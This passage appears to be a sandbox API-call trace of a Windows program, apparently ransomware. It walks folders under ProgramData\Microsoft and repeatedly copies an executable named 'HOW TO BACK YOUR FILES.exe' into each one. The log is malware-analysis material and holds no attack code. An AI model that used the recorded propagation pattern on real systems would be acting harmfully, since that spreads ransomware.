Data\\Microsoft\\OfficeSoftwareProtectionPlatform" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform" [0090.611] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.611] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\officesoftwareprotectionplatform\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.611] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.611] GetLastError () returned 0x0 [0090.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.612] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.612] CloseHandle (hObject=0x120) returned 1 [0090.612] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.612] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.612] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64762240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x64762240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.612] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" [0090.612] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0090.612] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0090.612] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned 101 [0090.612] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache" [0090.612] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.612] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\officesoftwareprotectionplatform\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.613] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.613] GetLastError () returned 0x0 [0090.613] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.613] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.613] CloseHandle (hObject=0x120) returned 1 [0090.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.613] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.613] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8ab1ae70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64905160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x64905160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.613] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE" [0090.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x321228 | out: hHeap=0x2b0000) returned 1 [0090.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0090.613] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE") returned 69 [0090.613] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE" [0090.613] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.614] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\office\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.614] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.614] GetLastError () returned 0x0 [0090.614] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.614] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.615] CloseHandle (hObject=0x120) returned 1 [0090.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.615] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.615] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x64b40600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x64b40600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.615] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions" [0090.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0090.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0090.615] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions") returned 80 [0090.615] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions" [0090.615] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.615] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\office\\uicaptions\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.616] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.616] GetLastError () returned 0x0 [0090.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.616] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.616] CloseHandle (hObject=0x120) returned 1 [0090.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.616] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.616] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x4c5e97a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c5e97a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.616] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082" [0090.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e87c0 | out: hHeap=0x2b0000) returned 1 [0090.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0090.616] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082") returned 85 [0090.616] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082" [0090.616] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.617] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\office\\uicaptions\\3082\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.617] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.617] GetLastError () returned 0x0 [0090.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.617] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.617] CloseHandle (hObject=0x120) returned 1 [0090.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.617] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.617] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x65a20f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x65a20f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.618] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036" [0090.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0090.618] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036") returned 85 [0090.618] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036" [0090.618] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.618] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\office\\uicaptions\\1036\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.618] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.619] GetLastError () returned 0x0 [0090.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.619] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.619] CloseHandle (hObject=0x120) returned 1 [0090.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.619] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.619] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x666a0300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x666a0300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.619] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network" [0090.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x321190 | out: hHeap=0x2b0000) returned 1 [0090.619] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0090.619] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network") returned 70 [0090.619] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network" [0090.619] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.619] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\network\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.620] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.620] GetLastError () returned 0x0 [0090.620] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.620] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.620] CloseHandle (hObject=0x120) returned 1 [0090.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.620] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.620] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c60f900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.621] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Downloader", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Downloader") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Downloader" [0090.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e27c0 | out: hHeap=0x2b0000) returned 1 [0090.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0090.621] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Downloader") returned 81 [0090.621] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Downloader" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Downloader") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Downloader" [0090.621] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.621] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Downloader\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\network\\downloader\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.621] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.621] GetLastError () returned 0x0 [0090.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.622] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.622] CloseHandle (hObject=0x120) returned 1 [0090.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.622] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.622] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6681d0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6681d0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.622] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Connections", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Connections") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Connections" [0090.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0090.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0090.622] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Connections") returned 82 [0090.622] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Connections" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Connections") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Connections" [0090.622] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.622] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Network\\Connections\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\network\\connections\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.623] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.623] GetLastError () returned 0x0 [0090.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.623] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, 